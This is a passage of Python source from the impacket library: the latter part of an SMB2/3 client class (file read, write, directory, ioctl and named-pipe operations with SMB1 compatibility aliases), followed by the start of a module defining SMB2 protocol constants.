SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_WRITE packet['TreeID'] = treeId if self._Connection['MaxWriteSize'] < bytesToWrite: maxBytesToWrite = self._Connection['MaxWriteSize'] else: maxBytesToWrite = bytesToWrite if self._Connection['Dialect'] != SMB2_DIALECT_002 and self._Connection['SupportsMultiCredit'] is True: packet['CreditCharge'] = ( 1 + (maxBytesToWrite - 1) / 65536) else: maxBytesToWrite = min(65536,bytesToWrite) smbWrite = SMB2Write() smbWrite['FileID'] = fileId smbWrite['Length'] = maxBytesToWrite smbWrite['Offset'] = offset smbWrite['WriteChannelInfoOffset'] = 0 smbWrite['Buffer'] = data[:maxBytesToWrite] packet['Data'] = smbWrite packetID = self.sendSMB(packet) if waitAnswer == True: ans = self.recvSMB(packetID) else: return maxBytesToWrite if ans.isValidAnswer(STATUS_SUCCESS): writeResponse = SMB2Write_Response(ans['Data']) bytesWritten = writeResponse['Count'] if bytesWritten < bytesToWrite: bytesWritten += self.write(treeId, fileId, data[bytesWritten:], offset+bytesWritten, bytesToWrite-bytesWritten, waitAnswer) return bytesWritten def queryDirectory(self, treeId, fileId, searchString = '*', resumeIndex = 0, informationClass = FILENAMES_INFORMATION, maxBufferSize = None, enumRestart = False, singleEntry = False): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_QUERY_DIRECTORY packet['TreeID'] = treeId queryDirectory = SMB2QueryDirectory() queryDirectory['FileInformationClass'] = informationClass if resumeIndex != 0 : queryDirectory['Flags'] = SMB2_INDEX_SPECIFIED queryDirectory['FileIndex'] = resumeIndex queryDirectory['FileID'] = fileId if maxBufferSize is None: maxBufferSize = self._Connection['MaxReadSize'] queryDirectory['OutputBufferLength'] = maxBufferSize queryDirectory['FileNameLength'] = len(searchString)*2 queryDirectory['Buffer'] = searchString.encode('utf-16le') packet['Data'] = queryDirectory if self._Connection['Dialect'] != SMB2_DIALECT_002 and self._Connection['SupportsMultiCredit'] is True: packet['CreditCharge'] = ( 1 + (maxBufferSize - 1) / 65536) packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): queryDirectoryResponse = SMB2QueryDirectory_Response(ans['Data']) return queryDirectoryResponse['Buffer'] def echo(self): packet = self.SMB_PACKET() packet['Command'] = SMB2_ECHO smbEcho = SMB2Echo() packet['Data'] = smbEcho packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): return True def cancel(self, packetID): packet = self.SMB_PACKET() packet['Command'] = SMB2_CANCEL packet['MessageID'] = packetID smbCancel = SMB2Cancel() packet['Data'] = smbCancel packetID = self.sendSMB(packet) def ioctl(self, treeId, fileId = None, ctlCode = -1, flags = 0, inputBlob = '', maxInputResponse = None, maxOutputResponse = None, waitAnswer = 1): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if fileId is None: fileId = '\xff'*16 else: if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_IOCTL packet['TreeID'] = treeId smbIoctl = SMB2Ioctl() smbIoctl['FileID'] = fileId smbIoctl['CtlCode'] = ctlCode smbIoctl['MaxInputResponse'] = maxInputResponse smbIoctl['MaxOutputResponse'] = maxOutputResponse smbIoctl['InputCount'] = len(inputBlob) if len(inputBlob) == 0: smbIoctl['InputOffset'] = 0 smbIoctl['Buffer'] = '\x00' else: smbIoctl['Buffer'] = inputBlob smbIoctl['OutputOffset'] = 0 smbIoctl['MaxOutputResponse'] = maxOutputResponse smbIoctl['Flags'] = flags packet['Data'] = smbIoctl packetID = self.sendSMB(packet) if waitAnswer == 0: return True ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): smbIoctlResponse = SMB2Ioctl_Response(ans['Data']) return smbIoctlResponse['Buffer'] def flush(self,treeId, fileId): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_FLUSH packet['TreeID'] = treeId smbFlush = SMB2Flush() smbFlush['FileID'] = fileId packet['Data'] = smbFlush packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): smbFlushResponse = SMB2Flush_Response(ans['Data']) return True def lock(self, treeId, fileId, locks, lockSequence = 0): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_LOCK packet['TreeID'] = treeId smbLock = SMB2Lock() smbLock['FileID'] = fileId smbLock['LockCount'] = len(locks) smbLock['LockSequence'] = lockSequence smbLock['Locks'] = ''.join(str(x) for x in locks) packet['Data'] = smbLock packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): smbFlushResponse = SMB2Lock_Response(ans['Data']) return True # ToDo: # If Open.ResilientHandle is TRUE or Connection.SupportsMultiChannel is TRUE, the client MUST # do the following: # The client MUST scan through Open.OperationBuckets and find an element with its Free field # set to TRUE. If no such element could be found, an implementation-specific error MUST be # returned to the application. # Let the zero-based array index of the element chosen above be referred to as BucketIndex, and # let BucketNumber = BucketIndex +1. # Set Open.OperationBuckets[BucketIndex].Free = FALSE # Let the SequenceNumber of the element chosen above be referred to as BucketSequence. # The LockSequence field of the SMB2 lock request MUST be set to (BucketNumber<< 4) + # BucketSequence. # Increment the SequenceNumber of the element chosen above using MOD 16 arithmetic. def logoff(self): packet = self.SMB_PACKET() packet['Command'] = SMB2_LOGOFF smbLogoff = SMB2Logoff() packet['Data'] = smbLogoff packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): return True def queryInfo(self, treeId, fileId, inputBlob = '', infoType = SMB2_0_INFO_FILE, fileInfoClass = SMB2_FILE_STANDARD_INFO, additionalInformation = 0, flags = 0 ): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_QUERY_INFO packet['TreeID'] = treeId queryInfo = SMB2QueryInfo() queryInfo['FileID'] = fileId queryInfo['InfoType'] = SMB2_0_INFO_FILE queryInfo['FileInfoClass'] = fileInfoClass queryInfo['OutputBufferLength'] = 65535 queryInfo['AdditionalInformation'] = additionalInformation if len(inputBlob) == 0: queryInfo['InputBufferOffset'] = 0 queryInfo['Buffer'] = '\x00' else: queryInfo['InputBufferLength'] = len(inputBlob) queryInfo['Buffer'] = inputBlob queryInfo['Flags'] = flags packet['Data'] = queryInfo packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): queryResponse = SMB2QueryInfo_Response(ans['Data']) return queryResponse['Buffer'] def setInfo(self, treeId, fileId, inputBlob = '', infoType = SMB2_0_INFO_FILE, fileInfoClass = SMB2_FILE_STANDARD_INFO, additionalInformation = 0 ): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_SET_INFO packet['TreeID'] = treeId setInfo = SMB2SetInfo() setInfo['InfoType'] = SMB2_0_INFO_FILE setInfo['FileInfoClass'] = fileInfoClass setInfo['BufferLength'] = len(inputBlob) setInfo['AdditionalInformation'] = additionalInformation setInfo['FileID'] = fileId setInfo['Buffer'] = inputBlob packet['Data'] = setInfo packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): return True ###################################################################### # Higher level functions def rename(self, shareName, oldPath, newPath): oldPath = string.replace(oldPath,'/', '\\') oldPath = ntpath.normpath(oldPath) if len(oldPath) > 0 and oldPath[0] == '\\': oldPath = oldPath[1:] newPath = string.replace(newPath,'/', '\\') newPath = ntpath.normpath(newPath) if len(newPath) > 0 and newPath[0] == '\\': newPath = newPath[1:] treeId = self.connectTree(shareName) fileId = None try: fileId = self.create(treeId, oldPath, MAXIMUM_ALLOWED ,FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, 0x200020, FILE_OPEN, 0) renameReq = FILE_RENAME_INFORMATION_TYPE_2() renameReq['ReplaceIfExists'] = 1 renameReq['RootDirectory'] = '\x00'*8 renameReq['FileNameLength'] = len(newPath)*2 renameReq['FileName'] = newPath.encode('utf-16le') self.setInfo(treeId, fileId, renameReq, infoType = SMB2_0_INFO_FILE, fileInfoClass = SMB2_FILE_RENAME_INFO) finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) return True def writeFile(self, treeId, fileId, data, offset = 0): finished = False writeOffset = offset while not finished: if len(data) == 0: break writeData = data[:self._Connection['MaxWriteSize']] data = data[self._Connection['MaxWriteSize']:] written = self.write(treeId, fileId, writeData, writeOffset, len(writeData)) writeOffset += written return writeOffset - offset def listPath(self, shareName, path, password = None): # ToDo: Handle situations where share is password protected path = string.replace(path,'/', '\\') path = ntpath.normpath(path) if len(path) > 0 and path[0] == '\\': path = path[1:] treeId = self.connectTree(shareName) fileId = None try: # ToDo, we're assuming it's a directory, we should check what the file type is fileId = self.create(treeId, ntpath.dirname(path), FILE_READ_ATTRIBUTES | FILE_READ_DATA ,FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, FILE_OPEN, 0) res = '' files = [] from impacket import smb while True: try: res = self.queryDirectory( treeId, fileId, ntpath.basename(path), maxBufferSize = 65535 ) nextOffset = 1 while nextOffset != 0: fileInfo = smb.SMBFindFileNamesInfo(smb.SMB.FLAGS2_UNICODE) fileInfo.fromString(res) files.append(smb.SharedFile(0,0,0,0,0,0,fileInfo['FileName'].decode('utf-16le'), fileInfo['FileName'].decode('utf-16le'))) nextOffset = fileInfo['NextEntryOffset'] res = res[nextOffset:] except SessionError, e: if (e.get_error_code()) != STATUS_NO_MORE_FILES: raise break finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) return files def mkdir(self, shareName, pathName, password = None): # ToDo: Handle situations where share is password protected pathName = string.replace(pathName,'/', '\\') pathName = ntpath.normpath(pathName) if len(pathName) > 0 and pathName[0] == '\\': pathName = pathName[1:] treeId = self.connectTree(shareName) fileId = None try: fileId = self.create(treeId, pathName,GENERIC_ALL ,FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, FILE_CREATE, 0) finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) return True def rmdir(self, shareName, pathName, password = None): # ToDo: Handle situations where share is password protected pathName = string.replace(pathName,'/', '\\') pathName = ntpath.normpath(pathName) if len(pathName) > 0 and pathName[0] == '\\': pathName = pathName[1:] treeId = self.connectTree(shareName) fileId = None try: fileId = self.create(treeId, pathName,GENERIC_ALL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_DIRECTORY_FILE | FILE_DELETE_ON_CLOSE, FILE_OPEN, 0) finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) return True def remove(self, shareName, pathName, password = None): # ToDo: Handle situations where share is password protected pathName = string.replace(pathName,'/', '\\') pathName = ntpath.normpath(pathName) if len(pathName) > 0 and pathName[0] == '\\': pathName = pathName[1:] treeId = self.connectTree(shareName) fileId = None try: fileId = self.create(treeId, pathName,GENERIC_ALL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_NON_DIRECTORY_FILE | FILE_DELETE_ON_CLOSE, FILE_OPEN, 0) finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) return True def retrieveFile(self, shareName, path, callback, mode = FILE_OPEN, offset = 0, password = None): # ToDo: Handle situations where share is password protected path = string.replace(path,'/', '\\') path = ntpath.normpath(path) if len(path) > 0 and path[0] == '\\': path = path[1:] treeId = self.connectTree(shareName) fileId = None from impacket import smb try: fileId = self.create(treeId, path, FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, mode, 0 ) res = self.queryInfo(treeId, fileId) fileInfo = smb.SMBQueryFileStandardInfo(res) fileSize = fileInfo['EndOfFile'] if (fileSize-offset) < self._Connection['MaxReadSize']: # Skip reading 0 bytes files. if (fileSize-offset) > 0: data = self.read(treeId, fileId, offset, fileSize-offset) callback(data) else: written = 0 toBeRead = fileSize-offset while written < (toBeRead): data = self.read(treeId, fileId, offset, self._Connection['MaxReadSize']) written += len(data) offset += len(data) callback(data) finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) def storeFile(self, shareName, path, callback, mode = FILE_OVERWRITE_IF, offset = 0, password = None): # ToDo: Handle situations where share is password protected path = string.replace(path,'/', '\\') path = ntpath.normpath(path) if len(path) > 0 and path[0] == '\\': path = path[1:] treeId = self.connectTree(shareName) fileId = None try: fileId = self.create(treeId, path, FILE_WRITE_DATA, FILE_SHARE_WRITE, FILE_NON_DIRECTORY_FILE, mode, 0 ) finished = False writeOffset = offset while not finished: data = callback(self._Connection['MaxWriteSize']) if len(data) == 0: break written = self.write(treeId, fileId, data, writeOffset, len(data)) writeOffset += written finally: if fileId is not None: self.close(treeId, fileId) self.disconnectTree(treeId) def waitNamedPipe(self, treeId, pipename, timeout = 5): pipename = ntpath.basename(pipename) if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if len(pipename) > 0xffff: raise SessionError(STATUS_INVALID_PARAMETER) pipeWait = FSCTL_PIPE_WAIT_STRUCTURE() pipeWait['Timeout'] = timeout*100000 pipeWait['NameLength'] = len(pipename)*2 pipeWait['TimeoutSpecified'] = 1 pipeWait['Name'] = pipename.encode('utf-16le') return self.ioctl(treeId, None, FSCTL_PIPE_WAIT,flags=SMB2_0_IOCTL_IS_FSCTL, inputBlob=pipeWait, maxInputResponse = 0, maxOutputResponse=0) ###################################################################### # Backward compatibility functions and alias for SMB1 and DCE Transports # NOTE: It is strongly recommended not to use these commands # when implementing new client calls. get_server_name = getServerName get_server_domain = getServerDomain get_remote_name = getServerName get_remote_host = getServerIP get_server_os = getServerOS tree_connect_andx = connectTree tree_connect = connectTree connect_tree = connectTree disconnect_tree = disconnectTree set_timeout = setTimeout use_timeout = useTimeout stor_file = storeFile retr_file = retrieveFile list_path = listPath def __del__(self): if self._NetBIOSSession: self._NetBIOSSession.close() def doesSupportNTLMv2(self): # Always true :P return True def is_login_required(self): # Always true :P return True def nt_create_andx(self, treeId, fileName, smb_packet=None, cmd = None): if len(fileName) > 0 and fileName[0] == '\\': fileName = fileName[1:] if cmd is not None: from impacket import smb ntCreate = smb.SMBCommand(data = str(cmd)) params = smb.SMBNtCreateAndX_Parameters(ntCreate['Parameters']) return self.create(treeId, fileName, params['AccessMask'], params['ShareAccess'], params['CreateOptions'], params['Disposition'], params['FileAttributes'], params['Impersonation'], params['SecurityFlags']) else: return self.create(treeId, fileName, FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES | FILE_READ_ATTRIBUTES | READ_CONTROL, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, 0 ) def get_socket(self): return self._NetBIOSSession.get_socket() def write_andx(self,tid,fid,data, offset = 0, wait_answer=1, write_pipe_mode = False, smb_packet=None): # ToDo: Handle the custom smb_packet situation return self.write(tid, fid, data, offset, len(data)) def TransactNamedPipe(self, tid, fid, data, noAnswer = 0, waitAnswer = 1, offset = 0): return self.ioctl(tid, fid, FSCTL_PIPE_TRANSCEIVE, SMB2_0_IOCTL_IS_FSCTL, data, maxOutputResponse = 65535, waitAnswer = noAnswer | waitAnswer) def TransactNamedPipeRecv(self): ans = self.recvSMB() if ans.isValidAnswer(STATUS_SUCCESS): smbIoctlResponse = SMB2Ioctl_Response(ans['Data']) return smbIoctlResponse['Buffer'] def read_andx(self, tid, fid, offset=0, max_size = None, wait_answer=1, smb_packet=None): # ToDo: Handle the custom smb_packet situation if max_size is None: max_size = self._Connection['MaxReadSize'] return self.read(tid, fid, offset, max_size, wait_answer) def list_shared(self): # In the context of SMB2/3, forget about the old LANMAN, throw NOT IMPLEMENTED raise SessionError(STATUS_NOT_IMPLEMENTED) def open_andx(self, tid, fileName, open_mode, desired_access): # ToDo Return all the attributes of the file if len(fileName) > 0 and fileName[0] == '\\': fileName = fileName[1:] fileId = self.create(tid,fileName,desired_access, open_mode, FILE_NON_DIRECTORY_FILE, open_mode, 0) return fileId, 0, 0, 0, 0, 0, 0, 0, 0 impacket-0.9.10/impacket/smb3structs.py0000600000076500000240000011671212141750575020124 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies) # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smb3structs.py 689 2012-08-20 18:23:35Z bethus@gmail.com $ # # Author: Alberto Solino (beto@coresecurity.com) # # Description: # SMB 2 and 3 Protocol Structures and constants [MS-SMB2] # from impacket.structure import Structure # Constants # SMB Packet SMB2_PACKET_SIZE = 64 # SMB Commands SMB2_NEGOTIATE = 0x0000 # SMB2_SESSION_SETUP = 0x0001 # SMB2_LOGOFF = 0x0002 # SMB2_TREE_CONNECT = 0x0003 # SMB2_TREE_DISCONNECT = 0x0004 # SMB2_CREATE = 0x0005 # SMB2_CLOSE = 0x0006 # SMB2_FLUSH = 0x0007 # SMB2_READ = 0x0008 # SMB2_WRITE = 0x0009 # SMB2_LOCK = 0x000A # SMB2_IOCTL = 0x000B # SMB2_CANCEL = 0x000C # SMB2_ECHO = 0x000D # SMB2_QUERY_DIRECTORY = 0x000E # SMB2_CHANGE_NOTIFY = 0x000F SMB2_QUERY_INFO = 0x0010 # SMB2_SET_INFO = 0x0011 SMB2_OPLOCK_BREAK = 0x0012 # SMB Flags SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001 SMB2_FLAGS_ASYNC_COMMAND = 0x00000002 SMB2_FLAGS_RELATED_OPERATIONS = 0x00000004 SMB2_FLAGS_SIGNED = 0x00000008 SMB2_FLAGS_DFS_OPERATIONS = 0x10000000 SMB2_FLAGS_REPLAY_OPERATION = 0x80000000 # SMB Error SymLink Flags SYMLINK_FLAG_ABSOLUTE = 0x0 SYMLINK_FLAG_RELATIVE = 0x1 # SMB2_NEGOTIATE # Security Modes SMB2_NEGOTIATE_SIGNING_ENABLED = 0x1 SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x2 # Capabilities SMB2_GLOBAL_CAP_DFS = 0x01 SMB2_GLOBAL_CAP_LEASING = 0x02 SMB2_GLOBAL_CAP_LARGE_MTU = 0x04 SMB2_GLOBAL_CAP_MULTI_CHANNEL = 0x08 SMB2_GLOBAL_CAP_PERSISTENT_HANDLES = 0x10 SMB2_GLOBAL_CAP_DIRECTORY_LEASING = 0x20 SMB2_GLOBAL_CAP_ENCRYPTION = 0x40 # Dialects SMB2_DIALECT_002 = 0x0202 SMB2_DIALECT_21 = 0x0210 SMB2_DIALECT_30 = 0x0300 SMB2_DIALECT_WILDCARD = 0x02FF # SMB2_SESSION_SETUP # Flags SMB2_SESSION_FLAG_BINDING = 0x01 SMB2_SESSION_FLAG_IS_GUEST = 0x01 SMB2_SESSION_FLAG_IS_NULL = 0x02 SMB2_SESSION_FLAG_ENCRYPT_DATA = 0x04 # SMB2_TREE_CONNECT # Types SMB2_SHARE_TYPE_DISK = 0x1 SMB2_SHARE_TYPE_PIPE = 0x2 SMB2_SHARE_TYPE_PRINT = 0x3 # Share Flags SMB2_SHAREFLAG_MANUAL_CACHING = 0x00000000 SMB2_SHAREFLAG_AUTO_CACHING = 0x00000010 SMB2_SHAREFLAG_VDO_CACHING = 0x00000020 SMB2_SHAREFLAG_NO_CACHING = 0x00000030 SMB2_SHAREFLAG_DFS = 0x00000001 SMB2_SHAREFLAG_DFS_ROOT = 0x00000002 SMB2_SHAREFLAG_RESTRICT_EXCLUSIVE_OPENS = 0x00000100 SMB2_SHAREFLAG_FORCE_SHARED_DELETE = 0x00000200 SMB2_SHAREFLAG_ALLOW_NAMESPACE_CACHING = 0x00000400 SMB2_SHAREFLAG_ACCESS_BASED_DIRECTORY_ENUM = 0x00000800 SMB2_SHAREFLAG_FORCE_LEVELII_OPLOCK = 0x00001000 SMB2_SHAREFLAG_ENABLE_HASH_V1 = 0x00002000 SMB2_SHAREFLAG_ENABLE_HASH_V2 = 0x00004000 SMB2_SHAREFLAG_ENCRYPT_DATA = 0x00008000 # Capabilities SMB2_SHARE_CAP_DFS = 0x00000008 SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY = 0x00000010 SMB2_SHARE_CAP_SCALEOUT = 0x00000020 SMB2_SHARE_CAP_CLUSTER = 0x00000040 # SMB_CREATE # Oplocks SMB2_OPLOCK_LEVEL_NONE = 0x00 SMB2_OPLOCK_LEVEL_II = 0x01 SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08 SMB2_OPLOCK_LEVEL_BATCH = 0x09 SMB2_OPLOCK_LEVEL_LEASE = 0xFF # Impersonation Level SMB2_IL_ANONYMOUS = 0x00000000 SMB2_IL_IDENTIFICATION = 0x00000001 SMB2_IL_IMPERSONATION = 0x00000002 SMB2_IL_DELEGATE = 0x00000003 # File Attributes FILE_ATTRIBUTE_ARCHIVE = 0x00000020 FILE_ATTRIBUTE_COMPRESSED = 0x00000800 FILE_ATTRIBUTE_DIRECTORY = 0x00000010 FILE_ATTRIBUTE_ENCRYPTED = 0x00004000 FILE_ATTRIBUTE_HIDDEN = 0x00000002 FILE_ATTRIBUTE_NORMAL = 0x00000080 FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000 FILE_ATTRIBUTE_OFFLINE = 0x00001000 FILE_ATTRIBUTE_READONLY = 0x00000001 FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400 FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200 FILE_ATTRIBUTE_SYSTEM = 0x00000004 FILE_ATTRIBUTE_TEMPORARY = 0x00000100 FILE_ATTRIBUTE_INTEGRITY_STREAM = 0x00000800 FILE_ATTRIBUTE_NO_SCRUB_DATA = 0x00020000 # Share Access FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 FILE_SHARE_DELETE = 0x00000004 # Create Disposition FILE_SUPERSEDE = 0x00000000 FILE_OPEN = 0x00000001 FILE_CREATE = 0x00000002 FILE_OPEN_IF = 0x00000003 FILE_OVERWRITE = 0x00000004 FILE_OVERWRITE_IF = 0x00000005 # Create Options FILE_DIRECTORY_FILE = 0x00000001 FILE_WRITE_THROUGH = 0x00000002 FILE_SEQUENTIAL_ONLY = 0x00000004 FILE_NO_INTERMEDIATE_BUFFERING = 0x00000008 FILE_SYNCHRONOUS_IO_ALERT = 0x00000010 FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020 FILE_NON_DIRECTORY_FILE = 0x00000040 FILE_COMPLETE_IF_OPLOCKED = 0x00000100 FILE_NO_EA_KNOWLEDGE = 0x00000200 FILE_RANDOM_ACCESS = 0x00000800 FILE_DELETE_ON_CLOSE = 0x00001000 FILE_OPEN_BY_FILE_ID = 0x00002000 FILE_OPEN_FOR_BACKUP_INTENT = 0x00004000 FILE_NO_COMPRESSION = 0x00008000 FILE_RESERVE_OPFILTER = 0x00100000 FILE_OPEN_REPARSE_POINT = 0x00200000 FILE_OPEN_NO_RECALL = 0x00400000 FILE_OPEN_FOR_FREE_SPACE_QUERY = 0x00800000 # File Access Mask / Desired Access FILE_READ_DATA = 0x00000001 FILE_WRITE_DATA = 0x00000002 FILE_APPEND_DATA = 0x00000004 FILE_READ_EA = 0x00000008 FILE_WRITE_EA = 0x00000010 FILE_EXECUTE = 0x00000020 FILE_READ_ATTRIBUTES = 0x00000080 FILE_WRITE_ATTRIBUTES = 0x00000100 DELETE = 0x00010000 READ_CONTROL = 0x00020000 WRITE_DAC = 0x00040000 WRITE_OWNER = 0x00080000 SYNCHRONIZE = 0x00100000 ACCESS_SYSTEM_SECURITY = 0x01000000 MAXIMUM_ALLOWED = 0x02000000 GENERIC_ALL = 0x10000000 GENERIC_EXECUTE = 0x20000000 GENERIC_WRITE = 0x40000000 GENERIC_READ = 0x80000000 # Directory Access Mask FILE_LIST_DIRECTORY = 0x00000001 FILE_ADD_FILE = 0x00000002 FILE_ADD_SUBDIRECTORY = 0x00000004 FILE_TRAVERSE = 0x00000020 FILE_DELETE_CHILD = 0x00000040 # Create Contexts SMB2_CREATE_EA_BUFFER = 0x45787441 SMB2_CREATE_SD_BUFFER = 0x53656344 SMB2_CREATE_DURABLE_HANDLE_REQUEST = 0x44486e51 SMB2_CREATE_DURABLE_HANDLE_RECONNECT = 0x44486e43 SMB2_CREATE_ALLOCATION_SIZE = 0x416c5369 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST = 0x4d784163 SMB2_CREATE_TIMEWARP_TOKEN = 0x54577270 SMB2_CREATE_QUERY_ON_DISK_ID = 0x51466964 SMB2_CREATE_REQUEST = 0x52714c73 SMB2_CREATE_REQUEST_LEASE_V2 = 0x52714c73 SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2 = 0x44483251 SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2 = 0x44483243 SMB2_CREATE_APP_INSTANCE_ID = 0x45BCA66AEFA7F74A9008FA462E144D74 # Flags SMB2_CREATE_FLAG_REPARSEPOINT = 0x1 FILE_NEED_EA = 0x80 # CreateAction FILE_SUPERSEDED = 0x00000000 FILE_OPENED = 0x00000001 FILE_CREATED = 0x00000002 FILE_OVERWRITTEN = 0x00000003 # SMB2_CREATE_REQUEST_LEASE states SMB2_LEASE_NONE = 0x00 SMB2_LEASE_READ_CACHING = 0x01 SMB2_LEASE_HANDLE_CACHING = 0x02 SMB2_LEASE_WRITE_CACHING = 0x04 # SMB2_CREATE_REQUEST_LEASE_V2 Flags SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET = 0x4 # SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2 Flags SMB2_DHANDLE_FLAG_PERSISTENT = 0x02 # SMB2_CLOSE # Flags SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB = 0x0001 # SMB2_READ # Channel SMB2_CHANNEL_NONE = 0x00 SMB2_CHANNEL_RDMA_V1 = 0x01 # SMB2_WRITE # Flags SMB2_WRITEFLAG_WRITE_THROUGH = 0x01 # Lease Break Notification SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED = 0x01 # SMB_LOCK # Flags SMB2_LOCKFLAG_SHARED_LOCK = 0x01 SMB2_LOCKFLAG_EXCLUSIVE_LOCK = 0x02 SMB2_LOCKFLAG_UNLOCK = 0x04 SMB2_LOCKFLAG_FAIL_IMMEDIATELY = 0x10 # SMB IOCTL # Control Codes FSCTL_DFS_GET_REFERRALS = 0x00060194 FSCTL_PIPE_PEEK = 0x0011400C FSCTL_PIPE_WAIT = 0x00110018 FSCTL_PIPE_TRANSCEIVE = 0x0011C017 FSCTL_SRV_COPYCHUNK = 0x001440F2 FSCTL_SRV_ENUMERATE_SNAPSHOTS = 0x00144064 FSCTL_SRV_REQUEST_RESUME_KEY = 0x00140078 FSCTL_SRV_READ_HASH = 0x001441bb FSCTL_SRV_COPYCHUNK_WRITE = 0x001480F2 FSCTL_LMR_REQUEST_RESILIENCY = 0x001401D4 FSCTL_QUERY_NETWORK_INTERFACE_INFO = 0x001401FC FSCTL_SET_REPARSE_POINT = 0x000900A4 FSCTL_DFS_GET_REFERRALS_EX = 0x000601B0 FSCTL_FILE_LEVEL_TRIM = 0x00098208 FSCTL_VALIDATE_NEGOTIATE_INFO = 0x00140204 # Flags SMB2_0_IOCTL_IS_FSCTL = 0x1 # SRV_READ_HASH # Type SRV_HASH_TYPE_PEER_DIST = 0x01 # Version SRV_HASH_VER_1 = 0x1 SRV_HASH_VER_2 = 0x2 # Retrieval Type SRV_HASH_RETRIEVE_HASH_BASED = 0x01 SRV_HASH_RETRIEVE_FILE_BASED = 0x02 # NETWORK_INTERFACE_INFO # Capabilities RSS_CAPABLE = 0x01 RDMA_CAPABLE = 0x02 # SMB2_QUERY_DIRECTORIES # Information Class FILE_DIRECTORY_INFORMATION = 0x01 FILE_FULL_DIRECTORY_INFORMATION = 0x02 FILEID_FULL_DIRECTORY_INFORMATION = 0x26 FILE_BOTH_DIRECTORY_INFORMATION = 0x03 FILEID_BOTH_DIRECTORY_INFORMATION = 0x25 FILENAMES_INFORMATION = 0x0C # Flags SMB2_RESTART_SCANS = 0x01 SMB2_RETURN_SINGLE_ENTRY = 0x02 SMB2_INDEX_SPECIFIED = 0x04 SMB2_REOPEN = 0x10 # SMB2_CHANGE_NOTIFY # Flags SMB2_WATCH_TREE = 0x01 # Filters FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001 FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002 